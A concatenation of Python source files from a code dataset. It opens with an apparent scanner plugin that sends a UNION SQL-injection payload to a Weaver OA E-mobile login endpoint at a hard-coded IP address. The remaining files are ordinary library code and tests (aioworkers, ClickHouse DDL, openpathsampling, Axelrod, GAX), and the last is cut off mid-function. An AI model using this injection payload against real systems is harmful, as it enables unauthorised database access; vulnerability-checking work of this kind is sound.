#ref http://www.wooyun.org/bugs/wooyun-2015-0105520
def assign(service, arg):
if service == "weaver_oa":
return True, arg
def audit(url):
payload = '''{"auths":[{"value":"-1%27%20UNION%20SELECT%201,2,md5(1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23"}]}'''
url += 'E-mobile/Data/login_other.php?diff=sync&auth='
url += payload
code, head,res, errcode, _ = curl.curl2(url)
if 'c4ca4238a0b923820dcc' in res:
security_hole(url)
if 'mysql_fetch_assoc' in res:
security_warning(url)
if __name__ == '__main__':
from dummy import *
audit(assign('weaver_oa', 'http://122.224.149.30:8082/')[1])
| 33.44
| 221
| 0.61244
|
0d0ca704097c712a9838afef51e6daa1b956643f
| 3,741
|
py
|
Python
|
aioworkers/worker/supervisor.py
|
aioworkers/aioworkers
|
51f15924698df4fe13d777d66ed70c7f34f09c3a
|
[
"Apache-2.0"
] | 45
|
2017-04-26T23:50:30.000Z
|
2021-12-29T03:21:06.000Z
|
aioworkers/worker/supervisor.py
|
aioworkers/aioworkers
|
51f15924698df4fe13d777d66ed70c7f34f09c3a
|
[
"Apache-2.0"
] | 63
|
2017-08-01T10:35:45.000Z
|
2022-03-01T18:07:49.000Z
|
aioworkers/worker/supervisor.py
|
aioworkers/aioworkers
|
51f15924698df4fe13d777d66ed70c7f34f09c3a
|
[
"Apache-2.0"
] | 6
|
2017-10-19T08:21:23.000Z
|
2021-12-29T03:25:32.000Z
|
import asyncio
import logging
import random
from .base import Worker
logger = logging.getLogger(__name__)
class Supervisor(Worker):
"""
config:
children: Union[int, list[str], list[dict]] - count or list
child: Mapping - config for child worker
"""
def __init__(self, *args, **kwargs):
self._children = {}
super().__init__(*args, **kwargs)
def __getattr__(self, item):
return self._children[item]
def __getitem__(self, item):
return self._children[item]
async def init(self):
children = [super()]
for p in self._gen_child_params():
name = p['name']
if name in self._children:
raise RuntimeError('Duplicate child name %s' % name)
child = self.create_child(p)
self._children[name] = child
children.append(child)
await self._wait(lambda w: w.init(), children)
def _wait(self, lmbd, children=()):
children = children or self._children.values()
return self.context.wait_all([lmbd(w) for w in children])
def __call__(self, *args, **kwargs):
if self.input is None:
vs = random.choice(list(self._children.values()))
return vs(*args, **kwargs)
else:
return self.input.put(*args, **kwargs)
def _gen_child_params(self):
children = self.config.children
if isinstance(children, int):
for i in range(children):
yield {'name': 'child' + str(i)}
elif isinstance(children, list):
for i in children:
if isinstance(i, str):
yield {'name': i}
elif isinstance(i, dict):
yield i
else:
raise RuntimeError('Unexpected type of parameter %s', i)
else:
raise RuntimeError('Unexpected type of parameter children')
def get_child_config(self, *args, **kwargs):
return self.config.child.new_child(*args, **kwargs)
def create_child(self, *args, **kwargs):
conf = self.get_child_config(*args, **kwargs)
add = {}
if not conf.get('input') and self.input is not None:
add['input'] = self.name
if not conf.get('output') and self.output is not None:
add['output'] = self.name
cls = conf.get_obj('cls')
add['name'] = '.'.join([self.name, conf.get('name', 'child')])
if add:
conf = conf.new_child(add)
return cls(conf, context=self.context, loop=self.loop)
async def get(self):
return await self.input.get()
async def put(self, *args, **kwargs):
return await self.output.put(*args, **kwargs)
async def work(self):
children = list(self._children.values())
if self._persist:
then = asyncio.FIRST_EXCEPTION
else:
then = asyncio.ALL_COMPLETED
while self._children:
await self._wait(lambda w: w.start(), children)
d, p = await asyncio.wait(
[i._future for i in self._children.values()],
loop=self.loop, return_when=then)
if not self._persist:
break
await asyncio.sleep(1, loop=self.loop)
children = [i for i in self._children.values() if i._future in d]
async def stop(self, force=False):
await super().stop(force=True)
await self._wait(lambda w: w.stop(force=force))
async def status(self):
status = await super().status()
status['children'] = {}
for name, w in self._children.items():
status['children'][name] = await w.status()
return status
| 33.401786
| 77
| 0.566961
|
10b8b97ceeac8d2461a7770c1d389e0c2f52898b
| 1,449
|
py
|
Python
|
test/test_modify_contact.py
|
MaximM27/Pythonfortesting_trainig
|
07c283c4ac88fd2bb0ee81983abe8177a9b2eada
|
[
"Apache-2.0"
] | null | null | null |
test/test_modify_contact.py
|
MaximM27/Pythonfortesting_trainig
|
07c283c4ac88fd2bb0ee81983abe8177a9b2eada
|
[
"Apache-2.0"
] | null | null | null |
test/test_modify_contact.py
|
MaximM27/Pythonfortesting_trainig
|
07c283c4ac88fd2bb0ee81983abe8177a9b2eada
|
[
"Apache-2.0"
] | null | null | null |
from model.contact import Contact
import random
def test_modify_contact_firstname(app, db, check_ui):
if len(db.get_contact_list()) == 0:
app.contact.add_contact(Contact(firstname="test"))
old_contacts = db.get_contact_list()
cont = random.choice(old_contacts)
cont_index = old_contacts.index(cont)
new_contact = Contact(firstname="New firstname")
new_contact.id = old_contacts[cont_index].id
new_contact.firstname = old_contacts[cont_index].firstname
new_contact.lastname = old_contacts[cont_index].lastname
new_contact.middlename = old_contacts[cont_index].middlename
app.contact.modify_contact_by_id(new_contact.id, new_contact)
new_contacts = db.get_contact_list()
assert len(old_contacts) == len(new_contacts)
old_contacts.remove(cont)
old_contacts.append(new_contact)
assert sorted(old_contacts, key=Contact.id_or_max) == sorted(new_contacts, key=Contact.id_or_max)
if check_ui:
assert sorted(new_contacts, key=Contact.id_or_max) == sorted(app.contact.get_contact_list(), key=Contact.id_or_max)
#def test_modify_first_contact_lastname(app):
# if app.contact.count() == 0:
# app.contact.add_contact(Contact(lastname="test"))
# old_contacts = app.contact.get_contact_list()
# app.contact.modify_first_contact(Contact(lastname="New lastname"))
# new_contacts = app.contact.get_contact_list()
# assert len(old_contacts) == len(new_contacts)
| 43.909091
| 123
| 0.752243
|
c507b9f6bd9fdff35c4afd95a0a02d8ea48a0938
| 6,292
|
py
|
Python
|
tests/test_ddl.py
|
athre0z/clickhouse-sqlalchemy
|
d4be4a818c2fadef8eeb76a59d11ff82fc2c433a
|
[
"MIT"
] | 1
|
2021-07-07T09:06:00.000Z
|
2021-07-07T09:06:00.000Z
|
tests/test_ddl.py
|
athre0z/clickhouse-sqlalchemy
|
d4be4a818c2fadef8eeb76a59d11ff82fc2c433a
|
[
"MIT"
] | null | null | null |
tests/test_ddl.py
|
athre0z/clickhouse-sqlalchemy
|
d4be4a818c2fadef8eeb76a59d11ff82fc2c433a
|
[
"MIT"
] | null | null | null |
from sqlalchemy import Column
from sqlalchemy.sql.ddl import CreateTable
from clickhouse_sqlalchemy import types, engines, Table
from clickhouse_sqlalchemy.sql.ddl import DropTable
from tests.testcase import BaseTestCase
from tests.session import mocked_engine
class DDLTestCase(BaseTestCase):
def test_create_table(self):
table = Table(
't1', self.metadata(),
Column('x', types.Int32, primary_key=True),
Column('y', types.String),
Column('z', types.String(10)),
# Must be quoted:
Column('index', types.String),
engines.Memory()
)
# No NOT NULL. And any PKS.
self.assertEqual(
self.compile(CreateTable(table)),
'CREATE TABLE t1 ('
'x Int32, y String, z FixedString(10), "index" String) '
'ENGINE = Memory'
)
def test_create_table_nested_types(self):
table = Table(
't1', self.metadata(),
Column('x', types.Int32, primary_key=True),
Column('y', types.Array(types.String)),
engines.Memory()
)
self.assertEqual(
self.compile(CreateTable(table)),
'CREATE TABLE t1 '
'(x Int32, y Array(String)) '
'ENGINE = Memory'
)
table = Table(
't1', self.metadata(),
Column('x', types.Int32, primary_key=True),
Column('y', types.Array(types.Array(types.String))),
engines.Memory()
)
self.assertEqual(
self.compile(CreateTable(table)),
'CREATE TABLE t1 '
'(x Int32, y Array(Array(String))) '
'ENGINE = Memory'
)
table = Table(
't1', self.metadata(),
Column('x', types.Int32, primary_key=True),
Column('y', types.Array(types.Array(types.String))),
engines.Memory()
)
self.assertEqual(
self.compile(CreateTable(table)),
'CREATE TABLE t1 '
'(x Int32, y Array(Array(String))) '
'ENGINE = Memory'
)
def test_create_table_nullable(self):
table = Table(
't1', self.metadata(),
Column('x', types.Int32, primary_key=True),
Column('y', types.Nullable(types.String)),
Column('z', types.Nullable(types.String(10))),
engines.Memory()
)
self.assertEqual(
self.compile(CreateTable(table)),
'CREATE TABLE t1 '
'(x Int32, y Nullable(String), z Nullable(FixedString(10))) '
'ENGINE = Memory'
)
def test_create_table_nested(self):
table = Table(
't1',
self.metadata(),
Column('x', types.Int32, primary_key=True),
Column('parent', types.Nested(
Column('child1', types.Int32),
Column('child2', types.String),
)),
engines.Memory()
)
self.assertEqual(
self.compile(CreateTable(table)),
'CREATE TABLE t1 ('
'x Int32, '
'parent Nested('
'child1 Int32, '
"child2 String"
')'
') ENGINE = Memory'
)
def test_create_table_nested_nullable(self):
table = Table(
't1', self.metadata(),
Column('x', types.Int32, primary_key=True),
Column('y', types.Array(types.Nullable(types.String))),
engines.Memory()
)
self.assertEqual(
self.compile(CreateTable(table)),
'CREATE TABLE t1 '
'(x Int32, y Array(Nullable(String))) '
'ENGINE = Memory'
)
def test_create_table_nullable_nested_nullable(self):
table = Table(
't1', self.metadata(),
Column('x', types.Int32, primary_key=True),
Column('y', types.Nullable(
types.Array(types.Nullable(types.String)))
),
engines.Memory()
)
self.assertEqual(
self.compile(CreateTable(table)),
'CREATE TABLE t1 '
'(x Int32, y Nullable(Array(Nullable(String)))) '
'ENGINE = Memory'
)
def test_table_create_on_cluster(self):
create_sql = (
'CREATE TABLE t1 ON CLUSTER test_cluster '
'(x Int32) ENGINE = Memory'
)
with mocked_engine() as engine:
table = Table(
't1', self.metadata(session=engine.session),
Column('x', types.Int32, primary_key=True),
engines.Memory(),
clickhouse_cluster='test_cluster'
)
table.create()
self.assertEqual(engine.history, [create_sql])
self.assertEqual(
self.compile(CreateTable(table)),
create_sql
)
def test_drop_table_clause(self):
table = Table(
't1', self.metadata(),
Column('x', types.Int32, primary_key=True)
)
self.assertEqual(
self.compile(DropTable(table)),
'DROP TABLE t1'
)
self.assertEqual(
self.compile(DropTable(table, if_exists=True)),
'DROP TABLE IF EXISTS t1'
)
def test_table_drop(self):
with mocked_engine() as engine:
table = Table(
't1', self.metadata(session=engine.session),
Column('x', types.Int32, primary_key=True)
)
table.drop(if_exists=True)
self.assertEqual(engine.history, ['DROP TABLE IF EXISTS t1'])
def test_table_drop_on_cluster(self):
drop_sql = 'DROP TABLE IF EXISTS t1 ON CLUSTER test_cluster'
with mocked_engine() as engine:
table = Table(
't1', self.metadata(session=engine.session),
Column('x', types.Int32, primary_key=True),
clickhouse_cluster='test_cluster'
)
table.drop(if_exists=True)
self.assertEqual(engine.history, [drop_sql])
self.assertEqual(
self.compile(DropTable(table, if_exists=True)),
drop_sql
)
| 30.692683
| 73
| 0.523999
|
3399e10fe8944dc9c416730e70108fdf8b6f2e39
| 3,542
|
py
|
Python
|
openpathsampling/storage/stores/trajectory.py
|
bolhuis/openpathsampling
|
4a12af0ee1143cdbc272b10a8c7cbea735566ce1
|
[
"MIT"
] | 64
|
2016-07-06T13:38:51.000Z
|
2022-03-30T15:58:01.000Z
|
openpathsampling/storage/stores/trajectory.py
|
bolhuis/openpathsampling
|
4a12af0ee1143cdbc272b10a8c7cbea735566ce1
|
[
"MIT"
] | 601
|
2016-06-13T10:22:01.000Z
|
2022-03-25T00:10:40.000Z
|
openpathsampling/storage/stores/trajectory.py
|
hejung/openpathsampling
|
e8b091c92916561954542d40d17d7241b203d1ad
|
[
"MIT"
] | 45
|
2016-11-10T11:17:53.000Z
|
2022-02-13T11:50:26.000Z
|
from openpathsampling.engines.trajectory import Trajectory
from openpathsampling.netcdfplus import ObjectStore, LoaderProxy
class TrajectoryStore(ObjectStore):
def __init__(self):
super(TrajectoryStore, self).__init__(Trajectory)
def to_dict(self):
return {}
def _save(self, trajectory, idx):
self.vars['snapshots'][idx] = trajectory
store = self.storage.snapshots
for frame, snapshot in enumerate(trajectory.iter_proxies()):
if type(snapshot) is not LoaderProxy:
loader = store.proxy(snapshot)
trajectory[frame] = loader
def mention(self, trajectory):
"""
Save a trajectory and store its snapshots only shallow
This will mention the ids of all snapshots in the file but not save
the content of all the snapshots. This way you can store CV values
if you want
Parameters
----------
trajectory : :class:`openpathsampling.Trajectory`
"""
snap_store = self.storage.snapshots
current_mention = snap_store.only_mention
snap_store.only_mention = True
self.save(trajectory)
snap_store.only_mention = current_mention
def _load(self, idx):
trajectory = Trajectory(self.vars['snapshots'][idx])
return trajectory
def cache_all(self):
"""Load all samples as fast as possible into the cache
"""
if not self._cached_all:
idxs = range(len(self))
snaps = self.vars['snapshots'][:]
[self.add_single_to_cache(i, j) for i, j in zip(
idxs,
snaps)]
self._cached_all = True
def add_single_to_cache(self, idx, snaps):
"""
Add a single object to cache by json
Parameters
----------
idx : int
the index where the object was stored
snaps : list of `BaseSnapshot`
json string the represents a serialized version of the stored object
"""
if idx not in self.cache:
obj = Trajectory(snaps)
self._get_id(idx, obj)
self.cache[idx] = obj
self.index[obj.__uuid__] = idx
return obj
def snapshot_indices(self, idx):
"""
Load snapshot indices for trajectory with ID 'idx' from the storage
Parameters
----------
idx : int
ID of the trajectory
Returns
-------
list of int
trajectory indices
"""
# get the values
return self.variables['snapshots'][idx].tolist()
def iter_snapshot_indices(self):
"""
Return an iterator over the lists of snapshot indices for all
trajectories in the storage
Returns
-------
Iterator
the iterator
"""
for snap_idx in range(len(self)):
yield self.snapshot_indices(snap_idx)
def initialize(self, units=None):
super(TrajectoryStore, self).initialize()
# index associated storage in class variable for all Trajectory
# instances to access
self.create_variable(
'snapshots',
'lazyobj.snapshots',
dimensions=('...',),
description="trajectory[trajectory][frame] is the snapshot index "
"(0..nspanshots-1) of frame 'frame' of trajectory "
"'trajectory'.",
chunksizes=(65536,)
)
| 27.671875
| 80
| 0.573687
|
4420ba3336da945314618164cc4c689e8e05d28e
| 4,226
|
py
|
Python
|
axelrod/tests/unit/test_apavlov.py
|
mattshirtliffe/Axelrod
|
367a787e16541fda6e6076200805f5bb6a863973
|
[
"MIT"
] | null | null | null |
axelrod/tests/unit/test_apavlov.py
|
mattshirtliffe/Axelrod
|
367a787e16541fda6e6076200805f5bb6a863973
|
[
"MIT"
] | null | null | null |
axelrod/tests/unit/test_apavlov.py
|
mattshirtliffe/Axelrod
|
367a787e16541fda6e6076200805f5bb6a863973
|
[
"MIT"
] | 1
|
2018-10-07T19:07:18.000Z
|
2018-10-07T19:07:18.000Z
|
"""Test APavlov."""
import axelrod
from .test_player import TestPlayer
C, D = axelrod.Actions.C, axelrod.Actions.D
class TestAPavlov2006(TestPlayer):
name = "Adapative Pavlov 2006"
player = axelrod.APavlov2006
expected_classifier = {
'memory_depth': float('inf'),
'stochastic': False,
'makes_use_of': set(),
'long_run_time': False,
'inspects_source': False,
'manipulates_source': False,
'manipulates_state': False
}
def test_strategy(self):
self.first_play_test(C)
self.responses_test([C] * 6, [C] * 6, [C],
attrs={"opponent_class": "Cooperative"})
self.responses_test([C, D, D, D, D, D], [D] * 6, [D],
attrs={"opponent_class": "ALLD"})
self.responses_test([C, D, C, D, C, D], [D, C, D, C, D, C], [C, C],
attrs={"opponent_class": "STFT"})
self.responses_test([C, D, D, C, D, D], [D, D, C, D, D, C], [D],
attrs={"opponent_class": "PavlovD"})
self.responses_test([C, D, D, C, D, D, C], [D, D, C, D, D, C, D], [C],
attrs={"opponent_class": "PavlovD"})
self.responses_test([C, D, D, C, D, D], [C, C, C, D, D, D], [D],
attrs={"opponent_class": "Random"})
self.responses_test([C, D, D, D, C, C], [D, D, D, C, C, C], [D],
attrs={"opponent_class": "Random"})
def test_reset(self):
player = self.player()
opponent = axelrod.Cooperator()
[player.play(opponent) for _ in range(10)]
player.reset()
self.assertEqual(player.opponent_class, None)
class TestAPavlov2011(TestPlayer):
name = "Adapative Pavlov 2011"
player = axelrod.APavlov2011
expected_classifier = {
'memory_depth': float('inf'),
'stochastic': False,
'makes_use_of': set(),
'long_run_time': False,
'inspects_source': False,
'manipulates_source': False,
'manipulates_state': False
}
def test_strategy(self):
self.first_play_test(C)
self.responses_test([C] * 6, [C] * 6, [C],
attrs={"opponent_class": "Cooperative"})
self.responses_test([C, D, D, D, D, D], [D] * 6, [D],
attrs={"opponent_class": "ALLD"})
self.responses_test([C, C, D, D, D, D], [C] + [D] * 5, [D],
attrs={"opponent_class": "ALLD"})
self.responses_test([C, C, C, D, D, D], [C, C] + [D] * 4, [D],
attrs={"opponent_class": "ALLD"})
self.responses_test([C, C, D, D, C, D], [C, D, D, C, D, D], [D],
attrs={"opponent_class": "ALLD"})
self.responses_test([C, C, D, D, D, C], [C, D, D, C, C, D], [C],
attrs={"opponent_class": "STFT"})
self.responses_test([C, C, D, C, D, C], [C, D, C, D, C, D], [C],
attrs={"opponent_class": "STFT"})
self.responses_test([C, D, D, D, C, C], [D, D, D, C, C, C], [C],
attrs={"opponent_class": "STFT"})
self.responses_test([C, D, D, D, C, C], [D, D, D, C, C, C], [C],
attrs={"opponent_class": "STFT"})
# Specific case for STFT when responding with TFT
opponent = axelrod.Player()
player = axelrod.APavlov2006()
player.history = [D] * 8
opponent.history = [D] * 8
player.opponent_class = "STFT"
self.assertEqual(player.strategy(opponent), D)
opponent.history.append(C)
self.assertEqual(player.strategy(opponent), C)
self.responses_test([C, C, C, C, C, D], [C, C, C, C, D, D], [D],
attrs={"opponent_class": "Random"})
self.responses_test([C, D, D, C, C, C], [D, D, C, C, C, C], [D],
attrs={"opponent_class": "Random"})
def test_reset(self):
player = self.player()
opponent = axelrod.Cooperator()
[player.play(opponent) for _ in range(10)]
player.reset()
self.assertEqual(player.opponent_class, None)
| 40.634615
| 78
| 0.50071
|
5621619cc777a3b4db6a913a48826947eb818eda
| 20,261
|
py
|
Python
|
lib/test/test_api_callable.py
|
boswald1/django-homepage
|
c6f956d26b6f986be98c25022e763075ebf12bb1
|
[
"BSD-3-Clause"
] | 1
|
2018-12-12T04:48:15.000Z
|
2018-12-12T04:48:15.000Z
|
test-docker/venv/lib/python2.7/site-packages/test/test_api_callable.py
|
hmit208/appengine-transcoder
|
d3f7a292dccae6478955ab1121989868594f4ed8
|
[
"Apache-2.0"
] | null | null | null |
test-docker/venv/lib/python2.7/site-packages/test/test_api_callable.py
|
hmit208/appengine-transcoder
|
d3f7a292dccae6478955ab1121989868594f4ed8
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# pylint: disable=missing-docstring,no-self-use,no-init,invalid-name,protected-access
"""Unit tests for api_callable"""
from __future__ import absolute_import, division
import mock
import unittest2
from google.gax import (
api_callable, bundling, BackoffSettings, BundleDescriptor, BundleOptions,
CallSettings, CallOptions, INITIAL_PAGE, PageDescriptor, RetryOptions)
from google.gax.errors import GaxError, RetryError
_SERVICE_NAME = 'test.interface.v1.api'
_A_CONFIG = {
'interfaces': {
_SERVICE_NAME: {
'retry_codes': {
'foo_retry': ['code_a', 'code_b'],
'bar_retry': ['code_c']
},
'retry_params': {
'default': {
'initial_retry_delay_millis': 100,
'retry_delay_multiplier': 1.2,
'max_retry_delay_millis': 1000,
'initial_rpc_timeout_millis': 300,
'rpc_timeout_multiplier': 1.3,
'max_rpc_timeout_millis': 3000,
'total_timeout_millis': 30000
}
},
'methods': {
# Note that GAX should normalize this to snake case
'BundlingMethod': {
'retry_codes_name': 'foo_retry',
'retry_params_name': 'default',
'timeout_millis': 25000,
'bundling': {
'element_count_threshold': 6,
'element_count_limit': 10
}
},
'PageStreamingMethod': {
'retry_codes_name': 'bar_retry',
'retry_params_name': 'default',
'timeout_millis': 12000
}
}
}
}
}
_PAGE_DESCRIPTORS = {
'page_streaming_method': PageDescriptor(
'page_token', 'next_page_token', 'page_streams')
}
_BUNDLE_DESCRIPTORS = {'bundling_method': BundleDescriptor('bundled_field', [])}
_RETRY_DICT = {'code_a': Exception,
'code_b': Exception,
'code_c': Exception}
_FAKE_STATUS_CODE_1 = object()
_FAKE_STATUS_CODE_2 = object()
class CustomException(Exception):
def __init__(self, msg, code):
super(CustomException, self).__init__(msg)
self.code = code
class AnotherException(Exception):
pass
class TestCreateApiCallable(unittest2.TestCase):
def test_call_api_call(self):
settings = CallSettings()
my_callable = api_callable.create_api_call(
lambda _req, _timeout: 42, settings)
self.assertEqual(my_callable(None), 42)
def test_call_override(self):
settings = CallSettings(timeout=10)
my_callable = api_callable.create_api_call(
lambda _req, timeout: timeout, settings)
self.assertEqual(my_callable(None, CallOptions(timeout=20)), 20)
def test_call_kwargs(self):
settings = CallSettings(kwargs={'key': 'value'})
my_callable = api_callable.create_api_call(
lambda _req, _timeout, **kwargs: kwargs['key'], settings)
self.assertEqual(my_callable(None), 'value')
self.assertEqual(my_callable(None, CallOptions(key='updated')),
'updated')
@mock.patch('time.time')
@mock.patch('google.gax.config.exc_to_code')
def test_retry(self, mock_exc_to_code, mock_time):
mock_exc_to_code.side_effect = lambda e: e.code
to_attempt = 3
retry = RetryOptions(
[_FAKE_STATUS_CODE_1],
BackoffSettings(0, 0, 0, 0, 0, 0, 1))
# Succeeds on the to_attempt'th call, and never again afterward
mock_call = mock.Mock()
mock_call.side_effect = ([CustomException('', _FAKE_STATUS_CODE_1)] *
(to_attempt - 1) + [mock.DEFAULT])
mock_call.return_value = 1729
mock_time.return_value = 0
settings = CallSettings(timeout=0, retry=retry)
my_callable = api_callable.create_api_call(mock_call, settings)
self.assertEqual(my_callable(None), 1729)
self.assertEqual(mock_call.call_count, to_attempt)
@mock.patch('time.time')
def test_no_retry_if_no_codes(self, mock_time):
retry = RetryOptions([], BackoffSettings(1, 2, 3, 4, 5, 6, 7))
mock_call = mock.Mock()
mock_call.side_effect = CustomException('', _FAKE_STATUS_CODE_1)
mock_time.return_value = 0
settings = CallSettings(timeout=0, retry=retry)
my_callable = api_callable.create_api_call(mock_call, settings)
self.assertRaises(CustomException, my_callable, None)
self.assertEqual(mock_call.call_count, 1)
@mock.patch('time.time')
@mock.patch('google.gax.config.exc_to_code')
def test_retry_aborts_simple(self, mock_exc_to_code, mock_time):
def fake_call(dummy_request, dummy_timeout):
raise CustomException('', _FAKE_STATUS_CODE_1)
retry = RetryOptions(
[_FAKE_STATUS_CODE_1],
BackoffSettings(0, 0, 0, 0, 0, 0, 1))
mock_time.side_effect = [0, 2]
mock_exc_to_code.side_effect = lambda e: e.code
settings = CallSettings(timeout=0, retry=retry)
my_callable = api_callable.create_api_call(fake_call, settings)
try:
my_callable(None)
except RetryError as exc:
self.assertIsInstance(exc.cause, CustomException)
@mock.patch('time.time')
@mock.patch('google.gax.config.exc_to_code')
def test_retry_times_out_simple(self, mock_exc_to_code, mock_time):
mock_exc_to_code.side_effect = lambda e: e.code
to_attempt = 3
retry = RetryOptions(
[_FAKE_STATUS_CODE_1],
BackoffSettings(0, 0, 0, 0, 0, 0, 1))
mock_call = mock.Mock()
mock_call.side_effect = CustomException('', _FAKE_STATUS_CODE_1)
mock_time.side_effect = ([0] * to_attempt + [2])
settings = CallSettings(timeout=0, retry=retry)
my_callable = api_callable.create_api_call(mock_call, settings)
try:
my_callable(None)
except RetryError as exc:
self.assertIsInstance(exc.cause, CustomException)
self.assertEqual(mock_call.call_count, to_attempt)
@mock.patch('time.time')
@mock.patch('google.gax.config.exc_to_code')
def test_retry_aborts_on_unexpected_exception(
self, mock_exc_to_code, mock_time):
mock_exc_to_code.side_effect = lambda e: e.code
retry = RetryOptions(
[_FAKE_STATUS_CODE_1],
BackoffSettings(0, 0, 0, 0, 0, 0, 1))
mock_call = mock.Mock()
mock_call.side_effect = CustomException('', _FAKE_STATUS_CODE_2)
mock_time.return_value = 0
settings = CallSettings(timeout=0, retry=retry)
my_callable = api_callable.create_api_call(mock_call, settings)
self.assertRaises(Exception, my_callable, None)
self.assertEqual(mock_call.call_count, 1)
@mock.patch('time.time')
def test_retry_times_out_no_response(self, mock_time):
mock_time.return_value = 1
retry = RetryOptions(
[_FAKE_STATUS_CODE_1],
BackoffSettings(0, 0, 0, 0, 0, 0, 0))
settings = CallSettings(timeout=0, retry=retry)
my_callable = api_callable.create_api_call(lambda: None, settings)
self.assertRaises(RetryError, my_callable, None)
@mock.patch('time.sleep')
@mock.patch('time.time')
@mock.patch('google.gax.config.exc_to_code')
def test_retry_exponential_backoff(self, mock_exc_to_code, mock_time,
mock_sleep):
# pylint: disable=too-many-locals
mock_exc_to_code.side_effect = lambda e: e.code
MILLIS_PER_SEC = 1000
mock_time.return_value = 0
def incr_time(secs):
mock_time.return_value += secs
def api_call(dummy_request, timeout, **dummy_kwargs):
incr_time(timeout)
raise CustomException(str(timeout), _FAKE_STATUS_CODE_1)
mock_call = mock.Mock()
mock_sleep.side_effect = incr_time
mock_call.side_effect = api_call
params = BackoffSettings(3, 2, 24, 5, 2, 80, 2500)
retry = RetryOptions([_FAKE_STATUS_CODE_1], params)
settings = CallSettings(timeout=0, retry=retry)
my_callable = api_callable.create_api_call(mock_call, settings)
try:
my_callable(None)
except RetryError as exc:
self.assertIsInstance(exc.cause, CustomException)
self.assertGreaterEqual(mock_time(),
params.total_timeout_millis / MILLIS_PER_SEC)
# Very rough bounds
calls_lower_bound = params.total_timeout_millis / (
params.max_retry_delay_millis + params.max_rpc_timeout_millis)
self.assertGreater(mock_call.call_count, calls_lower_bound)
calls_upper_bound = (params.total_timeout_millis /
params.initial_retry_delay_millis)
self.assertLess(mock_call.call_count, calls_upper_bound)
def test_page_streaming(self):
# A mock grpc function that page streams a list of consecutive
# integers, returning `page_size` integers with each call and using
# the next integer to return as the page token, until `pages_to_stream`
# pages have been returned.
# pylint:disable=too-many-locals
page_size = 3
pages_to_stream = 5
# pylint: disable=abstract-method, too-few-public-methods
class PageStreamingRequest(object):
def __init__(self, page_token=0):
self.page_token = page_token
class PageStreamingResponse(object):
def __init__(self, nums=(), next_page_token=0):
self.nums = nums
self.next_page_token = next_page_token
fake_grpc_func_descriptor = PageDescriptor(
'page_token', 'next_page_token', 'nums')
def grpc_return_value(request, *dummy_args, **dummy_kwargs):
start = int(request.page_token)
if start > 0 and start < page_size * pages_to_stream:
return PageStreamingResponse(
nums=list(range(start,
start + page_size)),
next_page_token=start + page_size)
elif start >= page_size * pages_to_stream:
return PageStreamingResponse()
else:
return PageStreamingResponse(nums=list(range(page_size)),
next_page_token=page_size)
with mock.patch('grpc.UnaryUnaryMultiCallable') as mock_grpc:
mock_grpc.side_effect = grpc_return_value
settings = CallSettings(
page_descriptor=fake_grpc_func_descriptor, timeout=0)
my_callable = api_callable.create_api_call(
mock_grpc, settings=settings)
self.assertEqual(list(my_callable(PageStreamingRequest())),
list(range(page_size * pages_to_stream)))
unflattened_option = CallOptions(page_token=INITIAL_PAGE)
# Expect a list of pages_to_stream pages, each of size page_size,
# plus one empty page
expected = [list(range(page_size * n, page_size * (n + 1)))
for n in range(pages_to_stream)] + [()]
self.assertEqual(list(my_callable(PageStreamingRequest(),
unflattened_option)),
expected)
pages_already_read = 2
explicit_page_token_option = CallOptions(
page_token=str(page_size * pages_already_read))
# Expect a list of pages_to_stream pages, each of size page_size,
# plus one empty page, minus the pages_already_read
expected = [list(range(page_size * n, page_size * (n + 1)))
for n in range(pages_already_read, pages_to_stream)]
expected += [()]
self.assertEqual(list(my_callable(PageStreamingRequest(),
explicit_page_token_option)),
expected)
def test_bundling_page_streaming_error(self):
settings = CallSettings(
page_descriptor=object(), bundle_descriptor=object(),
bundler=object())
with self.assertRaises(ValueError):
api_callable.create_api_call(lambda _req, _timeout: 42, settings)
def test_bundling(self):
# pylint: disable=abstract-method, too-few-public-methods
class BundlingRequest(object):
def __init__(self, elements=None):
self.elements = elements
fake_grpc_func_descriptor = BundleDescriptor('elements', [])
bundler = bundling.Executor(BundleOptions(element_count_threshold=8))
def my_func(request, dummy_timeout):
return len(request.elements)
settings = CallSettings(
bundler=bundler, bundle_descriptor=fake_grpc_func_descriptor,
timeout=0)
my_callable = api_callable.create_api_call(my_func, settings)
first = my_callable(BundlingRequest([0] * 3))
self.assertIsInstance(first, bundling.Event)
self.assertIsNone(first.result) # pylint: disable=no-member
second = my_callable(BundlingRequest([0] * 5))
self.assertEqual(second.result, 8) # pylint: disable=no-member
def test_construct_settings(self):
defaults = api_callable.construct_settings(
_SERVICE_NAME, _A_CONFIG, dict(), _RETRY_DICT,
bundle_descriptors=_BUNDLE_DESCRIPTORS,
page_descriptors=_PAGE_DESCRIPTORS,
kwargs={'key1': 'value1'})
settings = defaults['bundling_method']
